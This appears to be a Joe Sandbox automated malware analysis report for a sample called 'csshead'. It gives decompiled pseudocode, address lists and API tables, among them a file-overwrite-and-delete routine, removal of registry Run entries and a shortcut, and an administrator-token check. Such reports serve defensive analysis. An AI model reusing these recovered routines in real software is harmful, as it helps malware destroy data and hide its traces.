															_t141 =  *0x4332e0(_t152, _a16);
															__eflags = _t141;
															if(_t141 >= 0) {
																goto L34;
															}
															L36:
															L00404940( &_v8);
															return _t141;
														}
													}
												}
											}
										}
									}
								} else {
									_a4 = lstrlenW(_t148) + 1;
									_t87 = E004036F0( &_a4, lstrlenW(_t148) + 1, 2);
									_t172 = _t163 + 0xc;
									__eflags = _t87;
									if(_t87 < 0) {
										L13:
										L00404940( &_v8);
										return 0x8007000e;
									} else {
										_t108 = _a4;
										__eflags = _a4 - 0x400;
										if(__eflags > 0) {
											L11:
											_t88 = L00405440( &_v8, _t139, _t108);
										} else {
											_t94 = L00404C30( &_a4, __eflags, _t108);
											_t172 = _t172 + 4;
											__eflags = _t94;
											if(_t94 == 0) {
												goto L11;
											} else {
												L00422450(_t108);
												_t88 = _t172;
											}
										}
										_t157 = L00403720(_t88, _t148, _t108, 3);
										__eflags = _t157;
										if(_t157 != 0) {
											_t90 = lstrlenA(_t157);
											_t124 = _t90 + _t139;
											__eflags = _t124 - _t139;
											if(_t124 < _t139) {
												L22:
												L00404940( &_v8);
												return 0x80004005;
											} else {
												__eflags = _t124 - _t90;
												if(_t124 < _t90) {
													goto L22;
												} else {
													__eflags = _t124 - 0x10e;
													if(_t124 >= 0x10e) {
														goto L22;
													} else {
														__eflags = 0x10e;
														L00403790(0x10e, _t161 + _t139 - 0x11c, 0x10e - _t139, _t157);
														_t104 = _v16;
														_t163 = _t172 + 0xc;
														goto L18;
													}
												}
											}
										} else {
											goto L13;
										}
									}
								}
							} else {
								L00404940( &_v8);
								return 0x8007007a;
							}
						} else {
							_t99 = L00403AA0();
							L00404940( &_v8);
							return _t99;
						}
					}
				}
			}

0x00405cb3
0x00405cb6
0x00405cc1
0x00405f91
0x00405fa2
0x00405cc7
0x00405cc7
0x00405ccc
0x00000000
0x00405cd2
0x00405cd2
0x00405cdb
0x00405cee
0x00405cfb
0x00405cff
0x00405d21
0x00405d27
0x00405d4b
0x00405d50
0x00405d53
0x00405d55
0x00405d58
0x00405d5a
0x00405e0c
0x00405e1d
0x00405e24
0x00405e29
0x00405e2c
0x00405e2e
0x00000000
0x00405e30
0x00405e30
0x00405e33
0x00405e39
0x00405e6f
0x00405e73
0x00405e3b
0x00405e3c
0x00405e41
0x00405e44
0x00405e46
0x00000000
0x00405e48
0x00405e4a
0x00405e4f
0x00405e4f
0x00405e46
0x00405e8a
0x00405e8c
0x00405e8e
0x00000000
0x00405e94
0x00405e9f
0x00405ea1
0x00405ea3
0x00405f63
0x00405f64
0x00405f6d
0x00405f6f
0x00405f71
0x00405f73
0x00405f73
0x00000000
0x00405ea9
0x00405ea9
0x00405eae
0x00405eb4
0x00405ec4
0x00405ec7
0x00405ecd
0x00000000
0x00405ecf
0x00405ed6
0x00405eda
0x00405ef7
0x00405efa
0x00405eff
0x00405f02
0x00405f04
0x00000000
0x00405f0a
0x00405f0a
0x00405f0d
0x00405f13
0x00405f2d
0x00405f31
0x00405f15
0x00405f16
0x00405f1b
0x00405f1e
0x00405f20
0x00000000
0x00405f22
0x00405f24
0x00405f29
0x00405f29
0x00405f20
0x00405f48
0x00405f4a
0x00405f4c
0x00000000
0x00405f52
0x00405f5d
0x00405f5f
0x00405f61
0x00000000
0x00000000
0x00405f78
0x00405f7b
0x00405f8e
0x00405f8e
0x00405f4c
0x00405f04
0x00405ecd
0x00405ea3
0x00405e8e
0x00405d60
0x00405d6f
0x00405d72
0x00405d77
0x00405d7a
0x00405d7c
0x00405dba
0x00405dbd
0x00405dd3
0x00405d7e
0x00405d7e
0x00405d81
0x00405d87
0x00405da1
0x00405da5
0x00405d89
0x00405d8a
0x00405d8f
0x00405d92
0x00405d94
0x00000000
0x00405d96
0x00405d98
0x00405d9d
0x00405d9d
0x00405d94
0x00405db4
0x00405db6
0x00405db8
0x00405dd7
0x00405ddd
0x00405de0
0x00405de2
0x00405e53
0x00405e56
0x00405e6c
0x00405de4
0x00405de4
0x00405de6
0x00000000
0x00405de8
0x00405de8
0x00405dee
0x00000000
0x00405df0
0x00405df6
0x00405e01
0x00405e06
0x00405e09
0x00000000
0x00405e09
0x00405dee
0x00405de6
0x00000000
0x00000000
0x00000000
0x00405db8
0x00405d7c
0x00405d29
0x00405d2c
0x00405d42
0x00405d42
0x00405d01
0x00405d01
0x00405d0b
0x00405d1e
0x00405d1e
0x00405cff
0x00405ccc

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00405CF5

Part of subcall function 00404410: CharNextA.USER32(?,00000000,?,00405D50), ref: 00404436

lstrlenW.KERNEL32(?), ref: 00405D61

Part of subcall function 00403720: WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00405861,00000000,?,00000001,00000003,00000001), ref: 00403748

lstrlenA.KERNEL32(00000000,00000000,?,?,00000003,?), ref: 00405DD7
lstrlenA.KERNEL32(?), ref: 00405E13

Part of subcall function 00401810: MultiByteToWideChar.KERNEL32(00000001,00000000,00000003,000000FF,?,00000001,00000001,00401D0B,?,?,00000001,00000003), ref: 00401835

800000A1.OLEAUT32(00000000,?,00000000,?,?,00000003,?), ref: 00405E99
lstrlenA.KERNEL32(?), ref: 00405EE9
800000A1.OLEAUT32(00000000,?,00000000,?,?,00000003,?), ref: 00405F57
80000002.OLEAUT32(00000000), ref: 00405F64

Part of subcall function 00403AA0: GetLastError.KERNEL32(00405D06), ref: 00403AA0

Strings

.tlb, xrefs: 00405EA9

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0042A946, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 92LIBRARYCODE

APIs

__getptd.LIBCMT ref: 0042A95F

Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB

__getptd.LIBCMT ref: 0042A96D

Part of subcall function 00425CFE: RtlEncodePointer.NTDLL(00000000), ref: 00425D00

_CallSETranslator.LIBCMT ref: 0042A9A4

Part of subcall function 00423FC2: __getptd.LIBCMT ref: 0042404D

_GetRangeOfTrysToCheck.LIBCMT ref: 0042A9D2

Part of subcall function 0042A8D8: _UnwindNestedFrames.LIBCMT ref: 0042A902

Part of subcall function 0042AF11: RtlDecodePointer.NTDLL(0043CFE8), ref: 0042AF23

Strings

csm, xrefs: 0042AA20, 0042A99A
csm, xrefs: 0042A9C5, 0042A9DD, 0042AA43, 0042A9C8
RCC, xrefs: 0042A98A
csm, xrefs: 0042AA15
MOC, xrefs: 0042A983

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00404608, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 88
sleepfile

C-Code - Quality: 96%

			E00404608(intOrPtr* _a4) {
				int _v8;
				CHAR* _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				void _v548;
				signed int _t42;
				char _t58;

				_v8 = 0;
				_v16 =  *_a4;
				_v12 = _a4 + 4;
				while(1) {
					_t42 = E00403988(_v12);
					asm("sbb eax, eax");
					if( ~( ~_t42) == 0) {
						break;
					}
					_v20 = CreateFileA(_v12, 0xc0000000, 0, 0, 3, 0x20000080, 0);
					if(_v20 == 0xffffffff) {
						L8:
						_v8 = DeleteFileA(_v12);
						if(_v8 != 0 || _v16 == 0) {
							L13:
							E00401440(_a4);
							return _v8;
						} else {
							if(_v16 <= 0x64) {
								Sleep(_v16);
								_v16 = 0;
							} else {
								Sleep(0x64);
								_v16 = _v16 - 0x64;
							}
							continue;
						}
					}
					_v24 = GetFileSize(_v20, 0);
					_t58 = (_v24 >> 9) + 1;
					if(_t58 <= 0) {
						L7:
						FlushFileBuffers(_v20);
						CloseHandle(_v20);
						goto L8;
					}
					_v36 = _t58;
					_v28 = 1;
					do {
						WriteFile(_v20,  &_v548, 0x200,  &_v32, 0);
						_v28 = _v28 + 1;
						_t21 =  &_v36;
						 *_t21 = _v36 - 1;
					} while ( *_t21 != 0);
					goto L7;
				}
				_v8 = 0xffffffff;
				goto L13;
			}

0x00404613
0x0040461b
0x00404624
0x00404627
0x0040462a
0x00404631
0x00404637
0x00000000
0x00000000
0x00404661
0x00404668
0x004046c6
0x004046d0
0x004046d7
0x0040470a
0x0040470d
0x00404718
0x004046df
0x004046e3
0x004046fa
0x00404702
0x004046e5
0x004046e7
0x004046ed
0x004046ed
0x00000000
0x004046e3
0x004046d7
0x00404676
0x0040467f
0x00404682
0x004046b2
0x004046b6
0x004046c0
0x00000000
0x004046c0
0x00404684
0x00404687
0x0040468e
0x004046a4
0x004046aa
0x004046ad
0x004046ad
0x004046ad
0x00000000
0x0040468e
0x00404639
0x00000000

APIs

Part of subcall function 00403988: FindFirstFileA.KERNEL32(?,?), ref: 004039A4
Part of subcall function 00403988: FindClose.KERNEL32(000000FF), ref: 004039BF

CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,20000080,00000000), ref: 0040465B
GetFileSize.KERNEL32(000000FF,00000000), ref: 00404670
WriteFile.KERNEL32(000000FF,?,00000200,?,00000000), ref: 004046A4
FlushFileBuffers.KERNEL32(000000FF), ref: 004046B6
CloseHandle.KERNEL32(000000FF), ref: 004046C0
DeleteFileA.KERNEL32(?), ref: 004046CA
Sleep.KERNEL32(00000064), ref: 004046E7
Sleep.KERNEL32(00000064), ref: 004046FA

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

Strings

d, xrefs: 004046ED

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004080BE, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80
window

C-Code - Quality: 90%

			E004080BE(intOrPtr __eax) {
				intOrPtr _v8;
				char _v265;
				void* _t13;
				void* _t15;
				char* _t27;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				signed int _t37;
				signed int _t39;
				char* _t42;
				struct HWND__* _t48;
				intOrPtr _t50;
				char* _t60;
				char* _t62;
				void* _t64;
				void* _t66;

				_t64 = _t66;
				_v8 = __eax;
				if( *0x40a038 != 0) {
					_t50 =  *0x40a038; // 0x0
					 *0x40b4f8(_t50);
				}
				 *0x40c24c = CreateEventA(0, 0xffffffff, 0, 0);
				 *0x40a29c = 0xffffffff;
				_t13 =  *0x40c24c; // 0x0
				WaitForSingleObject(_t13, 0xffffffff);
				_t15 =  *0x40c24c; // 0x0
				CloseHandle(_t15);
				E00401308( &_v265, 0x40b518);
				 *((char*)(_t64 + E004012DC(0x40b518) - 0x109)) = 0;
				E0040133C( &_v265, ".lnk");
				E0040471C( &_v265, 0, 0);
				E0040471C(0x40b518, 0x7530, 0xffffffff);
				if( *0x40a574 != 0) {
					_t48 =  *0x40a574; // 0x0
					SendMessageA(_t48, 0x10, 0, 0);
				}
				if( *0x40a034 == 0) {
					if(_v8 == 0) {
						_t27 =  *0x40a260; // 0x4021a4
						SHDeleteKeyA(0x80000001, _t27);
					} else {
						_t60 =  *0x40a260; // 0x4021a4
						E00408064(0x80000001, 0x40b752, _t60);
					}
					E00404A1C(0x80000001,  &_v265);
				} else {
					if(_v8 == 0) {
						_t42 =  *0x40a260; // 0x4021a4
						SHDeleteKeyA(0x80000002, _t42);
					} else {
						_t62 =  *0x40a260; // 0x4021a4
						E00408064(0x80000002, 0x40b752, _t62);
					}
					E00404A1C(0x80000002,  &_v265);
				}
				_t31 =  *0x40b510; // 0x0
				E00401828(_t31);
				_t33 =  *0x40a054; // 0x0
				ReleaseMutex(_t33);
				_t35 =  *0x40a054; // 0x0
				CloseHandle(_t35);
				_t37 =  *0x40a2a0; // 0x0
				asm("sbb eax, eax");
				_t39 =  ~( ~_t37);
				if(_t39 == 0) {
					ExitProcess(0);
				}
				return _t39;
			}

0x004080c1
0x004080c9
0x004080d3
0x004080d5
0x004080db
0x004080db
0x004080ef
0x004080f4
0x00408100
0x00408106
0x0040810c
0x00408112
0x00408123
0x00408132
0x00408146
0x00408158
0x0040816a
0x00408176
0x0040817e
0x00408184
0x00408184
0x00408191
0x004081d7
0x004081f0
0x004081fb
0x004081d9
0x004081de
0x004081e9
0x004081e9
0x0040820c
0x00408193
0x00408197
0x004081b0
0x004081bb
0x00408199
0x0040819e
0x004081a9
0x004081a9
0x004081cc
0x004081cc
0x00408211
0x00408216
0x0040821b
0x00408221
0x00408227
0x0040822d
0x00408233
0x0040823a
0x0040823c
0x00408240
0x00408244
0x00408244
0x0040824d

APIs

RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
CloseHandle.KERNEL32(00000000), ref: 00408112

Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790

SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
ExitProcess.KERNEL32 ref: 00408244

Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D

SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB

Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55

Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A

ReleaseMutex.KERNEL32(00000000), ref: 00408221
CloseHandle.KERNEL32(00000000), ref: 0040822D

Strings

.lnk, xrefs: 0040813A

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00414300, Relevance: 15.3, APIs: 10, Instructions: 298string

APIs

GetVersionExA.KERNEL32(?), ref: 00414333
SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 00414376
GetObjectA.GDI32(?,0000003C,?), ref: 004143AA
lstrcmp.KERNEL32(?,?), ref: 00414476
CreateFontIndirectA.GDI32(?), ref: 00414488
DrawTextA.USER32(00000000,0043632C,000000FF,?,00000424), ref: 00414541
SetRectEmpty.USER32(?), ref: 00414559
DrawTextA.USER32(00000000,00436328,000000FF,?,00000424), ref: 00414571
SystemParametersInfoA.USER32 ref: 004145EE

Part of subcall function 004128F0: SendMessageA.USER32(?,00000446,00100000,?), ref: 0041292D
Part of subcall function 004128F0: InvalidateRect.USER32(?,00000000,00000001), ref: 0041293B

SystemParametersInfoA.USER32(00001022,00000000,?,00000000), ref: 0041465D

Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19

Part of subcall function 00410C00: LoadLibraryA.KERNEL32(004362AC), ref: 00410C2D
Part of subcall function 00410C00: FreeLibrary.KERNEL32(00000000), ref: 00410C67

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004041CC, Relevance: 15.1, APIs: 10, Instructions: 88
thread

C-Code - Quality: 100%

			E004041CC() {
				char _v5;
				void* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				signed int _v28;
				int _v32;
				char _v36;
				void* _t51;

				_v5 = 0;
				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
				if(_v32 == 0 && GetLastError() == 0x3f0) {
					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
				}
				if(_v32 != 0) {
					_v16 = E004013DC(0x400);
					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
					CloseHandle(_v12);
					if(_v32 != 0) {
						AllocateAndInitializeSid(0x40a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
						_t51 =  *_v16 - 1;
						if(_t51 >= 0) {
							_v36 = _t51 + 1;
							_v28 = 0;
							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
								_v28 = _v28 + 1;
								_t28 =  &_v36;
								 *_t28 = _v36 - 1;
								if( *_t28 != 0) {
									continue;
								}
								goto L10;
							}
							_v5 = 1;
						}
						L10:
						FreeSid(_v24);
					}
					E00401440(_v16);
				}
				return _v5;
			}

0x004041d2
0x004041eb
0x004041f2
0x00404214
0x00404214
0x0040421b
0x0040422b
0x00404247
0x0040424e
0x00404258
0x00404278
0x00404283
0x00404286
0x00404289
0x0040428c
0x00404293
0x004042b2
0x004042b5
0x004042b5
0x004042b8
0x00000000
0x00000000
0x00000000
0x004042b8
0x004042ac
0x004042ac
0x004042ba
0x004042be
0x004042be
0x004042c7
0x004042c7
0x004042d2

APIs

GetCurrentThread.KERNEL32 ref: 004041DE
OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
GetLastError.KERNEL32 ref: 004041F4
GetCurrentProcess.KERNEL32 ref: 00404207
OpenProcessToken.ADVAPI32(00000000), ref: 0040420E

Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2

GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
CloseHandle.KERNEL32(?), ref: 0040424E
AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
EqualSid.ADVAPI32(?,?), ref: 004042A2
FreeSid.ADVAPI32(?), ref: 004042BE

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00405FB0, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274
registrycomstring

C-Code - Quality: 73%

			E00405FB0() {
				void* __edi;
				int _t80;
				int _t84;
				int _t86;
				void* _t88;
				int _t89;
				int _t100;
				int _t103;
				int _t108;
				int _t111;
				int _t114;
				int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				int _t120;
				int _t123;
				int* _t129;
				void* _t154;
				intOrPtr* _t172;
				int _t181;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t189;
				void* _t197;
				void* _t198;
				void* _t199;
				void* _t200;

				_t184 = _t185 - 0x6c;
				_t186 = _t185 - 0x12c;
				_t129 =  *(_t184 + 0x78);
				 *(_t184 + 0x68) = 0;
				if(_t129 == 0) {
					L41:
					__eflags = 0;
					return 0;
				} else {
					_t172 =  *((intOrPtr*)(_t184 + 0x74));
					_t197 =  *_t172 -  *0x436a60; // 0x0
					if(_t197 != 0) {
						L5:
						_push(_t184 + 0x68);
						_push(0x4359e8);
						_push(1);
						_push(0);
						_push(0x436a80);
						if( *0x433604() >= 0) {
							__eflags =  *_t129;
							if( *_t129 == 0) {
								L22:
								__eflags =  *(_t184 + 0x7c);
								if( *(_t184 + 0x7c) == 0) {
									 *0x4335e4(_t172, _t184 - 0xc0, 0x40);
									 *(_t184 + 0x78) = 0;
									_t84 = lstrlenW(_t184 - 0xc0);
									_t158 = _t184 + 0x7c;
									 *(_t184 + 0x7c) = _t84 + 1;
									_t86 = E004036F0(_t184 + 0x7c, _t84 + 1, 2);
									_t189 = _t186 + 0xc;
									__eflags = _t86;
									if(_t86 >= 0) {
										_t178 =  *(_t184 + 0x7c);
										__eflags =  *(_t184 + 0x7c) - 0x400;
										if(__eflags > 0) {
											L27:
											_t88 = L00405440(_t184 + 0x78, _t172, _t178);
										} else {
											_t111 = L00404C30(_t158, __eflags, _t178);
											_t189 = _t189 + 4;
											__eflags = _t111;
											if(_t111 == 0) {
												goto L27;
											} else {
												L00422450(_t178);
												_t88 = _t189;
											}
										}
										_t89 = L00403720(_t88, _t184 - 0xc0, _t178, 3);
										_t179 = _t89;
										__eflags = _t89;
										if(__eflags != 0) {
											L00403790(__eflags, _t184 - 0x40, 0x80, "CLSID\\");
											E004039C0(__eflags, _t184 - 0x40, 0x80, _t179);
											E004039C0(__eflags, _t184 - 0x40, 0x80, "\\Required Categories");
											 *((intOrPtr*)(_t184 + 0x50)) = 0x80000000;
											 *((intOrPtr*)(_t184 + 0x54)) = 0;
											 *((intOrPtr*)(_t184 + 0x58)) = 0;
											 *(_t184 + 0x5c) = 0;
											 *((intOrPtr*)(_t184 + 0x60)) = 0;
											 *((intOrPtr*)(_t184 + 0x64)) = 0;
											 *(_t184 + 0x7c) = 0;
											__eflags = L00403EC0(0x80000000, _t184 - 0x40, 0x20019);
											if(__eflags == 0) {
												_t108 = RegQueryInfoKeyA( *(_t184 + 0x5c), 0, 0, 0, _t184 + 0x7c, 0, 0, 0, 0, 0, 0, 0);
												L00403DE0(_t184 + 0x5c);
												__eflags = _t108;
												if(__eflags == 0) {
													__eflags =  *(_t184 + 0x7c);
													if(__eflags == 0) {
														L00403D60(_t184 + 0x50, _t184 - 0x40);
													}
												}
											}
											L00403790(__eflags, _t184 - 0x40, 0x80, "CLSID\\");
											E004039C0(__eflags, _t184 - 0x40, 0x80, _t179);
											E004039C0(__eflags, _t184 - 0x40, 0x80, "\\Implemented Categories");
											_t100 = L00403EC0(0x80000000, _t184 - 0x40, 0x20019);
											__eflags = _t100;
											if(_t100 == 0) {
												_t103 = RegQueryInfoKeyA( *(_t184 + 0x5c), 0, 0, 0, _t184 + 0x7c, 0, 0, 0, 0, 0, 0, 0);
												L00403DE0(_t184 + 0x5c);
												__eflags = _t103;
												if(_t103 == 0) {
													__eflags =  *(_t184 + 0x7c);
													if( *(_t184 + 0x7c) == 0) {
														L00403D60(_t184 + 0x50, _t184 - 0x40);
													}
												}
											}
											L00404D80(_t184 + 0x5c);
											L00404D80(_t184 + 0x50);
										}
									}
									L00404940(_t184 + 0x78);
								}
								_t80 =  *(_t184 + 0x68);
								__eflags = _t80;
								if(_t80 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t80 + 8))))(_t80);
								}
								goto L41;
							} else {
								do {
									__eflags =  *(_t184 + 0x7c);
									_t114 = _t129[1];
									 *((intOrPtr*)(_t184 + 0x40)) =  *_t114;
									 *((intOrPtr*)(_t184 + 0x44)) =  *((intOrPtr*)(_t114 + 4));
									 *((intOrPtr*)(_t184 + 0x48)) =  *((intOrPtr*)(_t114 + 8));
									_t115 =  *(_t184 + 0x68);
									 *((intOrPtr*)(_t184 + 0x4c)) =  *((intOrPtr*)(_t114 + 0xc));
									_t154 =  *_t115;
									_push(_t184 + 0x40);
									_push(1);
									_push(_t172);
									_push(_t115);
									if( *(_t184 + 0x7c) == 0) {
										__eflags =  *_t129 - 1;
										if( *_t129 != 1) {
											_t116 =  *((intOrPtr*)(_t154 + 0x20));
										} else {
											_t116 =  *((intOrPtr*)(_t154 + 0x18));
										}
										 *_t116();
										goto L21;
									} else {
										__eflags =  *_t129 - 1;
										if( *_t129 != 1) {
											_t118 =  *((intOrPtr*)(_t154 + 0x1c));
										} else {
											_t118 =  *((intOrPtr*)(_t154 + 0x14));
										}
										_t181 =  *_t118();
										__eflags = _t181;
										if(_t181 >= 0) {
											goto L21;
										} else {
											_t120 =  *(_t184 + 0x68);
											__eflags = _t120;
											if(_t120 != 0) {
												 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 8))))(_t120);
											}
											return _t181;
										}
									}
									goto L42;
									L21:
									_t129 =  &(_t129[2]);
									__eflags =  *_t129;
								} while ( *_t129 != 0);
								goto L22;
							}
						} else {
							_t123 =  *(_t184 + 0x68);
							if(_t123 == 0) {
								goto L41;
							} else {
								 *((intOrPtr*)( *((intOrPtr*)( *_t123 + 8))))(_t123);
								return 0;
							}
						}
					} else {
						_t198 =  *((intOrPtr*)(_t172 + 4)) -  *0x436a64; // 0x0
						if(_t198 != 0) {
							goto L5;
						} else {
							_t199 =  *((intOrPtr*)(_t172 + 8)) -  *0x436a68; // 0x0
							if(_t199 != 0) {
								goto L5;
							} else {
								_t200 =  *((intOrPtr*)(_t172 + 0xc)) -  *0x436a6c; // 0x0
								if(_t200 == 0) {
									goto L41;
								} else {
									goto L5;
								}
							}
						}
					}
				}
				L42:
			}

0x00405fb1
0x00405fb5
0x00405fbc
0x00405fc1
0x00405fca
0x004062a5
0x004062a5
0x004062b4
0x00405fd0
0x00405fd0
0x00405fd5
0x00405fdb
0x00406002
0x00406005
0x00406006
0x0040600b
0x0040600d
0x0040600f
0x0040601c
0x00406043
0x00406046
0x004060c2
0x004060c2
0x004060c6
0x004060d6
0x004060e3
0x004060ea
0x004060f4
0x004060f8
0x004060fb
0x00406100
0x00406103
0x00406105
0x0040610b
0x0040610e
0x00406114
0x0040612e
0x00406132
0x00406116
0x00406117
0x0040611c
0x0040611f
0x00406121
0x00000000
0x00406123
0x00406125
0x0040612a
0x0040612a
0x00406121
0x00406142
0x00406147
0x00406149
0x0040614b
0x0040615f
0x0040616e
0x00406181
0x0040619c
0x004061a3
0x004061a6
0x004061a9
0x004061ac
0x004061af
0x004061b2
0x004061ba
0x004061bc
0x004061d0
0x004061db
0x004061e0
0x004061e2
0x004061e4
0x004061e7
0x004061f0
0x004061f0
0x004061e7
0x004061e2
0x00406203
0x00406212
0x00406225
0x0040623e
0x00406243
0x00406245
0x00406259
0x00406264
0x00406269
0x0040626b
0x0040626d
0x00406270
0x00406279
0x00406279
0x00406270
0x0040626b
0x00406281
0x00406289
0x00406289
0x0040614b
0x00406291
0x00406291
0x00406296
0x00406299
0x0040629b
0x004062a3
0x004062a3
0x00000000
0x00406048
0x00406048
0x00406048
0x0040604c
0x00406051
0x00406057
0x0040605d
0x00406063
0x00406066
0x00406069
0x0040606e
0x0040606f
0x00406071
0x00406072
0x00406073
0x004060ab
0x004060ae
0x004060b5
0x004060b0
0x004060b0
0x004060b0
0x004060b8
0x00000000
0x00406075
0x00406075
0x00406078
0x0040607f
0x0040607a
0x0040607a
0x0040607a
0x00406084
0x00406086
0x00406088
0x00000000
0x0040608a
0x0040608a
0x0040608d
0x0040608f
0x00406097
0x00406097
0x004060a8
0x004060a8
0x00406088
0x00000000
0x004060ba
0x004060ba
0x004060bd
0x004060bd
0x00000000
0x00406048
0x0040601e
0x0040601e
0x00406023
0x00000000
0x00406029
0x0040602f
0x00406040
0x00406040
0x00406023
0x00405fdd
0x00405fe0
0x00405fe6
0x00000000
0x00405fe8
0x00405feb
0x00405ff1
0x00000000
0x00405ff3
0x00405ff6
0x00405ffc
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ffc
0x00405ff1
0x00405fe6
0x00405fdb
0x00000000

APIs

CoCreateInstance.OLE32(00436A80,00000000,00000001,004359E8,?), ref: 00406014
StringFromGUID2.OLE32(?,?,00000040), ref: 004060D6
lstrlenW.KERNEL32(?), ref: 004060EA

Part of subcall function 00403720: WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00405861,00000000,?,00000001,00000003,00000001), ref: 00403748

Part of subcall function 00403EC0: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,?,00404DD6,?,?,?,?), ref: 00403EFF
Part of subcall function 00403EC0: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00403F10

RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 004061D0
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,80000000,?,00020019), ref: 00406259

Part of subcall function 00403DE0: RegCloseKey.ADVAPI32 ref: 00403DEC

Part of subcall function 00403D60: GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,00407F6E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403D89
